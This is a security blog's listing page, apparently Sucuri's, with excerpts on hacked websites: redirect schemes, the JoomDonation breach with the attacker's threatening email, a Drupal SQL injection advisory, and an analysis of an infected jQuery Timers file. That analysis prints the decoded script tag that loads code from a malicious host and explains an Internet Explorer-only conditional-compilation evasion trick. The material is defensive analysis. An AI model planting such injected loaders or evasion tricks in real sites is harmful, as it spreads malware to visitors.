Fake jQuery Scripts in Nulled WordPress Plugins

fake-jquery-scripts

We recently investigated some random redirects on a WordPress website that would only happen to certain visitors. Traffic analysis showed us that it was not a server-side redirect, rather it happened due to some script loaded by the web pages.

A quick look through the HTML code revealed this script:

Fake jQuery script injection

Fake jQuery script injection

It was very suspicious for a few reasons:
Read More

Hacked Websites Redirect to Bitcoin

bitcoin

Recently, we began to notice that some hacked websites were redirecting traffic from certain browsers to the BitCoin site, bitcoin.org. What’s going on? Is Bitcoin using black hat SEO? Is their site malicious?

Redirect to bitcoin.org

Redirect chain to bitcoin.org in Unmask Parasites results

As you can see, the hacked website doesn’t redirect to bitcoin.org directly. It first redirects to 194 .6 .233 .7/mxjbb . cgi?default, which acts a at raffic directing system (TDS). This piece analyzes request parameters specific to the visitor (IP, browser, referrer, etc.) and makes a decision as to what to do with the particular request. The TDS may have different routes for users from different countries or users with different browsers. Furthermore, the TDS may be completely uninterested in certain requests (e.g. requests from search engine and security bots, or requests from browsers that can be very hard to exploit). A typical TDS would either return some HTTP error (e.g. 404 Page Not Found) or redirect unwanted traffic to some neutral third-party site. Most TDS are configured to dump unwanted traffic to google.com.
Read More

My Website Was Blacklisted By Google and Distributing Email Spam

Image by Benson Kua licensed under Creative Commons

Image by Benson Kua licensed under Creative Commons

Being blacklisted is one of the worst things that can happen to a website. The public shame coming from every visitor being stopped by the Big Red Warning page can literally destroy any online business, I am speaking from personal experience before joining the Sucuri team. When a website is blacklisted, users are unable to access the website without specifically agreeing to take on the risks. As a result, blacklisted websites lose around 95% of their traffic.

The following is a true story, based on my personal experience with a blacklisted website. This is actually how I came to know of Sucuri, and how I now work for them as their Social Media Specialist. Have no fear, nothing has been changed; these are real names and events. No additional websites have been harmed during the writing process.


Read More

The Impacts of a Hacked Website

Today, with the proliferation of open-source technologies like WordPress, Joomla and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website.

We are failing each other, we are not setting ourselves up for success. We are learning the hard way what large organizations already learned – being online is a responsibility and will eventually cost you something.

I recently shared a post talking to the motivations behind hacks. This post was important as it helped provide context and I encourage you to spend some time digesting the information. What it fails to do is what I want to focus on in this post.

What are the impacts of these hacks to your website? To your business?
Read More

Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files.


Read More

2014 Website Defacements

When a website has been defaced, it is often the most visual and obvious hack that a website can suffer from. They also come parceled with their own exquisite sense of dread. Nothing gives that gut-wrenching feeling of “I’ve been hacked” more than seeing this on your home page:

Defaced-Website-Upgrade-Security


Read More

JoomDonation Compromised

We are receiving reports from many users of the popular JoomDonation platform that they received a very scary email from someone that supposedly hacked into JoomDonation. The emails went to the registered accounts and contained the full names, so it looks like JoomDonation did in fact get breached.

This is the full email:

How the hell are you? No need to ask, I’m fine!

I’m the one who has hacked all of your sites, emails, accounts etc. that has been using JoomDonation.com site/components. Scaring? Hell Yea :-)

About 15 months ago, I was able to penetrate into several Joomla sites. One of these luckies was JoomDonation.com After a while I realised that their crappy components were used by other Joomla developers too so I injected my shells into JoomDonation.com components. As per result, I’ve a list of 300000+ Joomla users+emails and you’re just one of them, lucky thing :-)

..

Yea Yea I know you all have scanners, firewalls, admin tools etc installed on your server/site but you what? F*ck em all. They’re just noob tools. Think about, I’ve injected my own shells into 10000+ Joomla sites and none of you or your magic tools have been awared of.

WARNING: You have 5 days to clean up your sites then my bot will start putting your sites down. If your site was not so valuable for me, removing the components would be enough. If so, then I will most probably blackmail you soon :-)

Want an advice from a hacker? Don’t use any script from Thailand/Vietnam developers, their code is so crappy :-) Try Indian quality.

This email was sent to all JoomDonation.com users. We’ll meet again if you have accounts registered to other Joomla developers :-)

Our research team is trying to confirm if any of the downloads from JoomDonation contain a backdoor, and we will post more details soon on what we find.

The JoomDonation developer has confirmed their environment has been compromised, but believes the issues to be specific to their server:

Hi All

I believe this is not security issues in our components/extensions. Someone hacked our server (we are using bluehost VPS server for hosting our website) somehow and uses the email systems to send this spam emails to all of you.

They want to destroy our business (and they mentioned India somehow in the email). Just the quick update from us, we will provide more information when we found something!

We are really sorry for this trouble.

The concern here is two fold:

  1. How did the attackers penetrate JoomDonation? If they leveraged a Zero-Day, then it’s likely the attacker can in fact penetrate other environments configured the same way.
  2. How is the attacker contacting JoomDonation users? This leads you to believe that there has been some level of data breach and user PII information has been compromised.

Currently, the attacker appears to be contacting those that have purchased any of the JoomDonation extensions, which include:

  1. Events Booking
  2. OS Property
  3. EShop
  4. Membership Pro
  5. EDocman
  6. CSV Advanced
  7. OS Services Booking
  8. Joom Donation
  9. Documents Seller

In the meantime, we highly recommend disabling this extension from your website. I would also highly recommend putting it behind a Website Firewall (WAF) with all hardening options enabled to minimize the chances of a compromise in case the extension has a 0-day vulnerability or backdoor.

:::::Update: 20141126 :::::

Tuan provides more details on the compromise, he states:

Dear all,

As you know, today, our hosting account was hacked. The hacker got a small part of our users information (only name and email) and emailed to these users that their sites were hacked. Infact, these sites are not hacked at all.
We have been working hard on this issue. Here are something we found and would like to inform you about them:

1. The security issue is not related to our extensions at all. So all the sites which are using our extensions at the moment will still be safe.

2. The issue came from a security hole in the hosting server which we have used. We have been using a VPS server to secure customers data, unfortunately, there was still security hole and the server has no Firewall software, so the hacker could get into the system and stole these information. We are working to move our website to a more secure server with a better hosting provider. However, it will take us one or two days for doing that.

3. The hacker just got a small part of our users information (contain name, email) and publish some of them. Few hours after the information was published (just name and a part of the email – the domain of the email is hidden), it was deleted and could not be viewable from public. So the information would be secure from now as well

4. We can assure that your sites are still safe. However, we advice that you change super admin account (and FTP account) of your site.

5. We will continue analyzing the server logs and will inform more information about this issue ASAP.

We are really sorry about this issue and hope you will stay with us and do more business with us in the future. Our extensions are good and secure, it is just the hosting server insecure and causes us all these trouble.

Sincerely, JoomDonation

The Dangers of Hosted Scripts – Hacked jQuery Timers

Google blacklisted a client’s website claiming that malicious content was being displayed from “forogozoropoto(dot)2waky (dot)com”.

A scan didn’t reveal anything suspicious. The next step was to check all third-party scripts on the website. Soon we found the offending script. It was hxxp://jquery .offput .ca/js/jquery.timers.js – a jQuery Timers plugin that was moderately popular 5-6 years ago.

Right now, the jquery.offput.ca site is hacked. The home page appears to be blank, but it contains a few hidden links, one of which leads to a pharma spam doorway on another hacked site:

Unmask Parasites report for jquery.offput.ca

Unmask Parasites report for jquery.offput.ca


All JavaScript files on the website contain malicious code.

Sucuri SiteCheck report: infected jquery.js on jquery.offput.ca

Sucuri SiteCheck report: infected jquery.js on jquery.offput.ca



The plugin script jquery.timers.js is no exception (note the first line of code):

infected jquery.timers.js code

Infected jquery.timers.js code

The Payload

The malware in the JavaScript files is quite interesting.

First of all, the obfuscated part decodes to:

<script src="hxxp://forogozoropoto(dot)2waky(dot)com/7"></script>

So, we know this is definitely the source of the problem.

Next, you may have noticed this construction:

if(/*@cc_on!@*/false){malicious code}

Most browsers ignore the comment and never execute the malicious code, taking it as:

if(false){malicious code}

Internet Explorer is different. It interprets the comment as a conditional compilation statement and considers everything between /*@cc_on and @*/ as executable JavaScript. In this case, IE will see the injected code as:

if(!false){malicious code} 

It will always execute the malicious code, due to the inclusion of the commented “!” character.

This IE-only, conditional compilation hack will prevent the forogozoropoto(dot)2waky(dot)com script from loading in non-IE browsers, even if using an IE User-Agent string. This means that if you are using, say, a Linux sandbox with a browser that pretends to be Internet Explorer, and then monitor the HTTP traffic — you will not see any requests to forogozoropoto(dot)2waky(dot)com.

One more interesting thing here is that hxxp://jquery.offput.ca/js/jquery.timers.js only contains the malicious code if you request it using an IE User-Agent. For any other browsers, it returns unmodified code of the jQuery Timers plugin. This looks like either a server-level infection that patches JavaScript responses on-the-fly for qualifying requests, or hackers changed the handler of JavaScript files, making them executable by PHP (e.g. using AddHandler and php_value auto_prepend_file in .htaccesss ).

What Happened to the jQuery Timers Plugin?

After the initial release and a few years of plugin support, the developer lost interest and abandoned the jquery.offput.ca site. The page says the plugin has moved to the official jQuery plugin repository, and all updates will be available there only:

jQuery timers moved

jQuery timers moved

However, the repository URL is redirecting to jQuery.com, and it can’t be found using the search function. I suppose that the plugin has been completely abandoned, only living in local copies on some websites, and as as the hacked original version on the jquery.offput.ca site.

The Risks of Using Hosted Scripts

This is neither the first abandoned script, nor the last. Thousands of developers create plugins for jQuery. Many develop their own libraries. Some of those libraries become really popular, but there is no guarantee that developers will remain committed to supporting their software forever.

Of course, when you find some cool new script, you might want to do some tests linking directly to the script on the developer’s website — it’s fast, it works on any computer, and you don’t have to worry about serving extra JavaScript files — just focus on your own code. However, what works during the test stage is not always a great idea for a live public site.

Consider these potential situations and outcomes:

  • The plugin site is temporarily down (e.g. maintenance or server problem) — your site is broken.
  • The plugin author updated the .JS file with a buggy or incompatible version of the plugin – your site is broken.
  • The plugin author abandons the site (the domain expires) or moves the plugin to a different domain — your site is broken.
  • The plugin site gets hacked and some malicious code is injected into the plugin file — your site is spreading malware to your visitors.

There are plenty of risks connected to using scripts from third-party websites. As a web developer, you should generally avoid this practice. The only reasonable exception is using JavaScript libraries from trusted CDNs (e.g. Google Hosted Libraries). You can be sure that the CDN will guarantee integrity and availability of the files you need for a reasonably long time. All the rest should be hosted on servers that you control.

Please review your site code. If it still uses the jQuery Timers plugin, make sure to use a local version (you can get a clean version here) and don’t link to the infected jquery.timers.js file on the jquery.offput.ca site.

If you see any other scripts linked directly to third-party websites, you might want to consider serving those scripts directly from your site, or from a trusted CDN. This will prove to be a more reliable and secure solution.

Drupal Warns – Every Drupal 7 Website was Compromised Unless Patched

The Drupal team released an update to a critical SQL Injection vulnerability a few weeks ago and urged all their users to update or patch their sites as immediately.

Today the the Drupal team released a strong statement via a public service announcement:

You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.

In case you’re wondering, this is a very strong statement for any origanization, especially an open source project, to make. It’s one we agree with and tried to amplify, without causing alarm in the initial post. Less than 48 hours after their disclosure, we released a post saying that attacks were already in the wild and attempting to compromise every site they could.

The scariest part of this vulnerability is that since Drupal uses PDO, this vulnerability is not only limited to SELECT statements, an attacker is able to able to insert or modify arbitrary data in the database.

Severity, coupled with it’s simplicity is a recipe for disaster. It’s a matter of time before it’s integrated into the latest toolsets and attacks are actively detected.

The first attack started 8 hours after the disclosure. The attackers began hitting our honeypots with the following SQL Injection attempt…

One thing I want to make very clear is that every site behind our website firewall is and has been protected against this attack. We still recommended all our users patch, but our virtual patching (along with our SQL injection protection), kept and will continue to keep our clients sites safe.

Recovery Mode

If you have not patched your site in time and you were not using a Website Firewall with virtual patching enabled, you should assume that your site was indeed hacked. You need to defer to your incident response procedures and assume a compromise has occurred until you can prove otherwise.

The Drupal team provided some steps in their disclosure, but we also want to recommend the following steps:

  1. Check if your site is actively serving malware or spam. Free scanners like SiteCheck and Unmaskparasites exist for this purpose.
  2. Download a filesystem backup from before Oct 15th and compare all file changes since.
  3. Download a database backup from before Oct 15th and compare any changes there. Look for new users and new hooks specially. If you can, restore to that backup to be safe.
  4. Change all passwords.
  5. Look up for any new file added since.

The scary part of this issue is that Drupal, unlike many other of it’s counterparts – Joomla! and WordPress – is heavily employed in larger organizations (enterprises for lack of a better word). This means that it’s highly unlikely that they were able to patch. Unlike consumers and small business, large organizations have processes that dictate the steps that they are allowed to take and what points. Each step has a series of approvals and depending on the size of the organization those approvals can be exhaustive (meaning they can take time).

This is a recipe for disaster, if it’s true and those websites are in fact compromised, they could be leveraged and daisy chained for a massive malware distribution campaign. Take that into consideration with the size and audience of brands and the impact grows exponentially.

If you are one such organization that finds yourself in this type of situation, we highly recommend employing technology solutions that give you more time to follow your steps while still protecting your online property.

Popular Brazilian Site “Porta dos Fundos” Hacked

A very well known Brazilian comedy site, “Porta dos Fundos,” was recently hacked and is pushing malware (drive-by-download) via a malicious Flash executable, as you can see from our Sitecheck results:

SiteCheck Found Malware on Porta dos Fundos

SiteCheck Found Malware on Porta dos Fundos

If you do not want the joke to be on you, do not visit this site (portadosfundos) until it has been cleaned.

The infection starts with malicious javascript injected at the top of the code, which loads content from another compromised site, www.gpro.co.mz:


Read More